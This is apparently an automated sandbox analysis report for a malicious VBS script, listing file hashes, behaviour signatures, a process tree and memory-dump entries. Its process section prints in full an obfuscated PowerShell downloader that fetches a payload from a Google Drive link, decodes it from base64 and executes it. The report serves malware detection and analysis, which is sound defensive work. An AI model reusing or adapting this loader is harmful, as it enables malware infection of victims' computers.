Overview

overview

8

Static

static

1

1980671213...59.vbs

windows7-x64

8

1980671213...59.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    08/05/2024, 01:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1980671213b1e430106e143d55e9c720f7c925fa9025d19635b61b2a0061d859.vbs

  • Size

    10KB

  • MD5

    0af963bf87233b7550e02def326787b2

  • SHA1

    20e2306b9c77aca90a8db3f6f32f5afbfc7b55bb

  • SHA256

    1980671213b1e430106e143d55e9c720f7c925fa9025d19635b61b2a0061d859

  • SHA512

    e15f5f0f6428cf10371cbc8802ef1df9b8a89a88b704cdceee3f489c04194b024bc35404daa41e113bb033d2deb57b710c9475793257e23882e3a71af834a323

  • SSDEEP

    192:J1BzGNLMQFn1gIwTKtrirKkVfT37vDW8hwMMOS5bI1n3y+IqZ4kxN7iySIple8YO:J3xbz8+3xN5pltQXlUp

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1980671213b1e430106e143d55e9c720f7c925fa9025d19635b61b2a0061d859.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2288
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Niacinamide = 1;$Atmosfreforladtes='S';$Atmosfreforladtes+='ubstrin';$Atmosfreforladtes+='g';Function Rejekllings($Filmically){$Musicalen=$Filmically.Length-$Niacinamide;For($Deltalfirmas=1;$Deltalfirmas -lt $Musicalen;$Deltalfirmas+=2){$Bertes+=$Filmically.$Atmosfreforladtes.Invoke( $Deltalfirmas, $Niacinamide);}$Bertes;}function Kommentering251($Plumbite){& ($Svrtbevbnet) ($Plumbite);}$Ataxy=Rejekllings '.MOo z i l lBa./P5,.S0m S(KW iSnFdEo,w sM EN,TS B1,0e..0T; BWNi nE6 4P;D xS6 4B;. r vD:,1 2.1 .s0U)L IGCe c,k.oh/,2 0.1C0A0 1R0I1M .FHiDrUe,f o xU/ 1 2U1I. 0 ';$Minna=Rejekllings ',UdsFeUrL-NATg eBn th ';$Opponenternes=Rejekllings ' hbtGtBpksH:A/T/,d,r i v e..Gg,oeo gSlTeG.Sc o mR/BupcJ? eHx pLoOrAtm=Sd oSw nBl.o aSdP&AiAdO= 1 Q AR-.n I k R y u.BGlU_FiSgHf s.c,0 g.mCn q rRna4g5 3F1 tit p.k ';$Kongerigerne=Rejekllings ' >L ';$Svrtbevbnet=Rejekllings 'Mi,eSxK ';$aforismer='Ekstern';Kommentering251 (Rejekllings 'ESJe t.-,C o nHt.eCnDt - P aItAh. UTT:m\LH y dLr oZdDi,c.t y a c eSa.e..,t,x tK ,-.V aNl u e C$TaLf oRrUi.sHmBe rd;O ');Kommentering251 (Rejekllings 'Ui.fM .(at eIsMtE-Mp,a t,h .T.: \SH,yTdTr oCd,ibc t,y.aGckeKaue .Et x.tS)A{.eExAi te}H;P ');$Hilted = Rejekllings '.e c h.o T% aSp pBdGa t,a % \Ts,t r ePg,t.e,gCn i nPgMe rUsD.HSFpSaE ,&U&U ecc h o $ ';Kommentering251 (Rejekllings ' $LgSl oSb a lr:SC o.k e.r,= (TcemSdC U/.cF $ H i lQt.e dF)D ');Kommentering251 (Rejekllings ' $,g.lAo,b a lT: D iRs pBl e.aMsKi nNg,nBe,sGs = $ O p pFoQnKe,nBt eNr nUePs,.Os pRlTiUt (H$NK.ornSgCe r iFg,e r n es)A ');$Opponenternes=$Displeasingness[0];Kommentering251 (Rejekllings '.$ gLlSoCbSa lA:,HBe.i.rMs k,i pB=.N e wG-CO,b j e.c tB USDy.sBtce,mu.BNDe tS.BWUeAb.COl i ePn.tM ');Kommentering251 (Rejekllings '.$AHSeSi r s.kRi p .FHUe,aPdSe.r s.[J$,M ipnSn.aD]F= $NATt.a x y, ');$Lungworts=Rejekllings 'MH.eOifr.sSk iMpv.GD,o,wMnklFoKa.d F iWl eC(F$ OSpSpOoUnKe nLtBeErSn.e,sC,C$KT,hPe oAs,oSphh i.e.sH8,4 )B ';$Lungworts=$Coker[1]+$Lungworts;$Theosophies84=$Coker[0];Kommentering251 (Rejekllings 'L$.gDl oTbSa lU:NLAaAmEeSnMt,aHb iFl e =f(KTWe.s tT- P.aVtLhL A$HTMhIe oFs,o p h iUe.s,8 4I)A ');while (!$Lamentabile) {Kommentering251 (Rejekllings ' $Tg,lMo bSa lE:SB,l.oHdCfGo,r gUi fTt.n i n,g eFr nReTs =K$,t,r,u,e ') ;Kommentering251 $Lungworts;Kommentering251 (Rejekllings 'JSCt.a rStT-.S.l e,e,pS 4O ');Kommentering251 (Rejekllings ',$TgBl o bAaSlB:SLKa m eKn.tIaSb,i l eI=P(UT,e.s t -DPNaFt h .$ TGhKeBo s.o,p h iVe.sa8 4D), ') ;Kommentering251 (Rejekllings 'E$Egdl oAb aVl,: M,a mFaEl.i.gYaS= $Pg lLoCbHa.l :FPBhLoFs.p hdo l iGp.aDsRe +F+L%S$ DSiFsMp.l,eIaUsRi nCg,n.eTs,s,.Sc oRuKnCt ') ;$Opponenternes=$Displeasingness[$Mamaliga];}Kommentering251 (Rejekllings ' $KgAl o.bSa lA:CSteUn.s.a.t iUoHnPs p r e s sTeT C=, ,G,e,t,-MCSo nMtVe.n,tU S$TT hhe o s,oAp h i eSsa8 4. ');Kommentering251 (Rejekllings 'M$.g lDo b a l,:MKliBl t.nPi nSg 1 3O B= .[ASFyNs t eTmM. CSoSnKv e.r,t,] :V:OFPrBoRmEB aBsPeJ6C4 Sbt rdi n.g (.$TS e.n s a tNi oSnSsGp ree s.s e )P ');Kommentering251 (Rejekllings ' $sgRlSo.b a l.:SS oPlRdaeBr iDs t. .=P S[TSEy.s tFe,m . T ePxCtA.SE.nDcboHdVi n g ],: :AA,S C III,.uGSe tTSAtbrUisn g,(R$ KFi.l tOn i.n g 1C3.)D ');Kommentering251 (Rejekllings ' $Kg.lRo bTa lM:RBSrCdPsPkLrBeSr ePsL=U$ S,o,l,dUeAr,i.sTtB.Ps uWbisUthr iEnBg.( 3P6s0,8 2,0 , 2 4 4z0.0 )K ');Kommentering251 $Brdskreres;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\stregtegningers.Spa && echo $"
        3⤵
          PID:2548

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\CabBF4.tmp
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      Download Submit

    • memory/2920-20-0x000007FEF624E000-0x000007FEF624F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2920-21-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2920-22-0x0000000001E90000-0x0000000001E98000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2920-23-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2920-25-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2920-26-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2920-24-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2920-27-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2920-28-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2920-29-0x000007FEF624E000-0x000007FEF624F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2920-30-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

      Filesize

      9.6MB

      Download